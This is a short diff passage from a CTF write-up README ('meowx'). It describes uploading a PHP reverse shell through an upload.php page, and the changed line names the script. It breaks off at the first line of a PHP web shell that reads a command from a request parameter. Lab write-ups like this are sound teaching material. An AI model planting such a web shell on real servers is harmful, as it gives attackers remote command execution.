rofikcroft/Write-ups/meowx official write-up/README.md

 &nbsp;
 ![dashboard page](dashboard-1.jpg)
 &nbsp;
 Now we can browse to `upload.php` to upload the file.
 Let's try to upload our *reverse shell* to the server.
-My *reverse shell* script looks fairly simple like this:
+My *reverse shell* script is named `reverse-shell.php` and looks fairly simple like this:
 ```php
 <?php
         $cmd = $_REQUEST["cmd"];